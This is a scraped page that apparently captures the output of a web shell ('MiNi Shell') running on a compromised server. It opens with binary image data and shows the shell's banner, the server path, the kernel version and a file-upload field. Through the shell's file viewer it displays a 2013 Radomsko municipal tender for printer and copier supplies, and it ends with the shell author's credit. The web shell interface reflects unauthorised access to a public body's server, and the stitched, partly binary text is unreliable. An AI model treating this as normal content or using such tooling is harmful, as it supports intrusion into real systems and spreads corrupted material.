JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/261921-N-2013.html

<p class="kh_header"><b>Radomsko: Sukcesywna  dostawa  nowych  materiałów eksploatacyjnych do drukarek, 
  kserokopiarek i faksów</b><br>
<b>Numer ogłoszenia: 261921 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Radomsko , ul. Tysiąclecia 5, 97-500 Radomsko, woj. łódzkie, tel. 044 6854571, faks 044 6854513, 6854521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radomsko.pl, www.bip.radomsko.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna  dostawa  nowych  materiałów eksploatacyjnych do drukarek, 
  kserokopiarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa nowych materiałów eksploatacyjnych                        do drukarek, kserokopiarek i faksów do siedziby Zamawiającego przy ul. Tysiąclecia 5 w Radomsku.

Wykonawca dostarczy zamówione fabrycznie nowe materiały eksploatacyjne do siedziby Zamawiającego w ramach wynagrodzenia za wykonanie całości przedmiotu zamówienia,                 w ciągu 2 dni roboczych od daty złożenia zamówienia przez Zamawiającego (przekazywanego listownie, e-mailem, faxem, telefonicznie);
Dostarczone materiały muszą być opakowane w sposób umożliwiający ich identyfikację (znak firmowy, termin ważności lub datę produkcji z okresem ważności, ilość, rodzaj itp.) bez konieczności naruszania opakowania oraz z wszystkimi zabezpieczeniami stosowanymi przez producentów, np. hologramy. Wszystkie materiały muszą być dostarczone w oryginalnych opakowaniach oraz posiadać zabezpieczenia, które pozwalają na prawidłowe przechowywanie oraz bezpieczny transport.
Dostarczone materiały eksploatacyjne muszą być fabrycznie nowe i posiadać termin przydatności do użycia nie krótszy niż 12 miesięcy, licząc od dnia ich dostarczenia do siedziby Zamawiającego.
Materiały eksploatacyjne muszą spełniać wszelkie wymagania wyrobów dopuszczonych do obrotu i stosowania w Polsce oraz muszą być wytworzone w zgodzie z prawami patentowymi.
2. Dopuszcza się składanie ofert równoważnych na materiały eksploatacyjne. 
Wykonawca, który powołuje się na rozwiązania równoważne do opisywanych przez Zamawiającego, jest zobowiązany wykazać, że oferowany przez niego przedmiot dostawy spełnia wymagania określone przez Zamawiającego. W tym celu wymaga się spełnienia następujących warunków oraz dołączenia do oferty stosownych dokumentów ( wymienionych pkt 6.1.5 ppkt  2 SIWZ) :
1) pełnej kompatybilności oferowanych materiałów eksploatacyjnych z urządzeniami, wymienionymi w Dodatku nr 4 do SIWZ,
2) oferowane materiały równoważne mają być fabrycznie nowe, nie regenerowane w ogóle, nie poddawane procesowi ponownego napełniania oraz wymiany jakichkolwiek elementów,
3) materiały nie mogą ograniczać pełnej współpracy z programem drukarki monitorującym stan zasobników z tuszem lub tonerem,
4) na opakowaniach równoważnych powinny być wypisane wszystkie typy drukarek, kserokopiarek z którymi tonery i tusze są kompatybilne, czyli dopuszczone do stosowania oraz termin przydatności do użycia,
5) należy wskazać do jakiego typu drukarki, kserokopiarki,faksu oferowany jest materiał (produkt) równoważny podając odpowiednio ( w formularzu ofertowym w kolumnie 9 - Równoważne materiały eksploatacyjne w  Tabeli 1- formularz cenowy dodatku nr 1 do SIWZ):
      a) nazwę producenta oferowanego materiału eksploatacyjnego, 
      b) nazwę - symbol (kod) oferowanego materiału eksploatacyjnego,
      c) wydajność wydruku standardowych stron A4 mierzona zgodnie z normą ISO/IEC 19752 -  
          w przypadku tonerów do drukarek laserowych monochromatycznych ,
     d) wydajność wydruku standardowych stron A4 mierzona zgodnie z normą ISO/IEC 19798 -  
         w przypadku tonerów do drukarek laserowych kolorowych,
     e) wydajność wydruku standardowych stron A4 mierzona zgodnie z normą ISO/IEC 24711                       
           - w przypadku tuszy do drukarek atramentowych,
     f)  Objętość kropli atramentu tj. Pikolitrów dla Głowic do drukarek,
     g)    wydajność dla taśm do drukarek igłowych,
     h)   wydajność wydruku standardowych stron A4  dla tonerów do kserokopiarek i faksów,  
6) proces produkcji oferowanych materiałów równoważnych musi być dostosowany do  wymogów norm ISO 14001, ISO 9001:2000.

7) oferowany materiał równoważny ma zagwarantować równą lub wyższą oraz powtarzalną jakość wydruków i wydajność co materiał zalecany przez producenta urządzenia, oferowane materiały eksploatacyjne muszą być: dopuszczone do obrotu na terenie RP, wolne od wad technicznych i prawnych, cała partia danego produktu musi posiadać identyczne oznaczenia oraz oryginalne fabryczne opakowania (z wszystkimi zabezpieczeniami stosowanymi przez producentów) bez śladów otwierania opakowania. Zamawiający dopuszcza zmianę opakowania tylko w sytuacji gdy producent je sam zmieni - wymagane oświadczenie producenta wraz z wzorem nowego opakowania. W sytuacji gdy Wykonawca nie dostarczy zaświadczenia bądź dostarczy towar niezgodny z opisem Zamawiający może odmówić przyjęcia towaru z wszelkimi konsekwencjami zawartymi w umowie, materiały równoważne mają gwarantować wykorzystanie wszystkich funkcji i możliwości drukowania w drukarkach,  kserokopiarkach i faksach  Zamawiającego oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta urządzeń.  
   

3. Wykonawca, który powołuje się na równoważne materiały eksploatacyjne do opisanych przez Zamawiającego ma obowiązek wykazać, że oferowane przez niego produkty(materiały) spełniają wymagania określone przez Zamawiającego. W tym celu Wykonawca zobowiązany jest wypełnić w formularzu ofertowym w tabeli 1 - formularz cenowy kolumnę nr 9   -,,Równoważne materiały eksploatacyjne (według informacji zamieszczonych w pkt 3.2 ppkt 5  SIWZ ). Jeżeli Wykonawca w tabeli 1 - formularz cenowy nie wypełni w danej-ych pozycji-ach kolumny nr 9, wówczas na etapie realizacji umowy Wykonawca ma obowiązek dostarczyć materiały eksploatacyjne (produkty), takie same jak wskazane (opisane) przez Zamawiającego w szczegółowym opisie przedmiotu zamówienia stanowiącym  Dodatek  nr 4 do SIWZ.

4. Szczegółowy opis przedmiotu zamówienia stanowi zestawienie materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów wraz z informacją o posiadanych przez Zamawiającego modelach drukarek, kserokopiarek i faksów -  Dodatek  nr 4 do SIWZ.
5. Wykonawca, który zaoferuje równoważne materiały eksploatacyjne zobowiązany jest do odbioru zużytych pojemników z tych materiałów po tuszach i tonerach w ilościach nie większych od dostarczonych do siedziby Zamawiającego  w ramach wynagrodzenia za wykonanie całości przedmiotu zamówienia w ustalonych z Zamawiającym terminach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości 3 000,00 zł (słownie: trzy tysiące złotych 00/100).
2. Wadium musi być wniesione przed upływem terminu składania ofert wskazanym w pkt 12.1 SIWZ.
   3. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
1)  pieniądzu, przelewem na rachunek bankowy Zamawiającego w ESBANK Banku 
     Spółdzielczym w Radomsku:
Nr rachunku:   98 8980 0009 2001 0037 5283 0014 
z dopiskiem: Wadium - Sukcesywna  dostawa  nowych  materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów
    Uwaga: 
Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego.
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
  4) gwarancjach ubezpieczeniowych;
 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
4.  Jeżeli wadium zostanie wniesione w formie, o której mowa w pkt 3 ppkt 2-5 wówczas Wykonawca złoży oryginał dokumentu wystawiony na rzecz Zamawiającego w siedzibie Zamawiającego w Punkcie Obsługi Interesanta - Biuro Podawcze (przed upływem terminu określonego w pkt 12.1 niniejszej SIWZ) w trwale zamkniętym opakowaniu (np. kopercie) opisanym tak jak opakowanie z ofertą z dopiskiem WADIUM. Dokument ten musi zachować ważność przez cały okres związania ofertą i umożliwiać jednocześnie Zamawiającemu zrealizowanie swojego uprawnienia, nawet  jeżeli zdarzenie stanowiące podstawę żądania wypłaty wadium zaistnieje w ostatnim dniu terminu związania ofertą. 
 W/w dokument musi zawierać w swojej treści oświadczenie poręczyciela lub gwaranta, że zobowiązuje się on do nieodwołalnej i bezwarunkowej wypłaty wadium                         na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty.
Tym samym, wadium musi zabezpieczać ofertę przez cały okres terminu związania ofertą w sposób  dający Zamawiającemu pewność pełnego zaspokojenia jego roszczeń zarówno co do ich maksymalnego zakresu, jak również bezwarunkowej                                 i nieodwołalnej ich realizacji na pierwsze pisemne żądanie wzywające do zapłaty,               w przypadku wystąpienia okoliczności ustawowych uprawniających do zatrzymania wadium.
5. Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, Wykonawca dołączy do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.                              Na poleceniu przelewu należy wpisać: Sukcesywna  dostawa  nowych  materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów
6. Zamawiający będzie dokonywał zwrotu lub zatrzymania wadium zgodnie z zasadami określonymi w  art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)  oświadczenie, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego np. w treści formularza ofertowego w pkt 3. 

2) w celu potwierdzenia że oferowane materiały (produkty) równoważne odpowiadają wymaganiom określonym przez Zamawiającego:
             
 a)  raport z testu wydajności potwierdzający wydajność materiałów równoważnych mierzoną zgodnie z normami: ISO/IEC 19752 dla tonerów do drukarek laserowych monochromatycznych, ISO/IEC 19798 dla tonerów do drukarek laserowych kolorowych, ISO/IEC 24711 dla tuszy do drukarek atramentowych (Dopuszcza się złożenie raportu w formie kserokopii poświadczonej za zgodność z oryginałem lub wydruku ze strony internetowej producenta lub upoważnionego  przedstawiciela podpisany przez Wykonawcę ze wskazaniem adresu tej strony),

b)  zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań producenta z normami jakościowymi, tj. z normą ISO 9001:2000 dla procesu produkcji oferowanych produktów,
c)   zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań producenta z europejskimi normami zarządzania środowiskiem,            tj. z normą ISO 14001dla procesu produkcji oferowanych produktów,
d)  oświadczenie Wykonawcy lub Producenta materiałów eksploatacyjnych, że wszystkie oferowane materiały eksploatacyjne  pochodzą z legalnego kanału dystrybucyjnego na teren Polski,  określonego przez producenta.

Uwaga:
Wykonawca może zamiast zaświadczeń, o których mowa w pkt ppkt 2 lit. b i c złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę                w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.

Wykonawca może zamiast zaświadczeń, o których mowa w ppkt 2 lit. b i c, złożyć inne dokumenty potwierdzające odpowiednio stosowanie przez producentów równoważnych środków zapewnienia jakości i stosowanie równoważnych środków zarządzania środowiskiem.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej zgodnie z art. 26 ust. 2d ustawy:
1) Oświadczenie o braku przynależności do grupy kapitałowej -  z wykorzystaniem wzoru określonego w dodatku nr 6 do SIWZ,
albo
2)  Oświadczenie o  przynależności do grupy kapitałowej wraz listą podmiotów należących do tej samej grupy kapitałowej - z wykorzystaniem wzoru określonego w dodatku nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić za zgodą obydwu stron wyrażoną na piśmie pod rygorem nieważności. Dopuszczalne zmiany oraz określenie warunków zmian zawarte zostały w projekcie umowy stanowiącym integralną część Specyfikacji istotnych warunków zamówienia (Dodatek nr 5 do SIWZ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radomsko.pl, www.bip.radomsko.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Radomska Biuro Zamówień Publicznych 97-500 Radomsko ul. Tysiąclecia 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 09:00, miejsce: Biuro Obsługi Interesanta -Biuro Podawcze w Urzędzie Miasta Radomska - parter budynku, 
97-500 Radomsko ul. Tysiąclecia 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 29 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com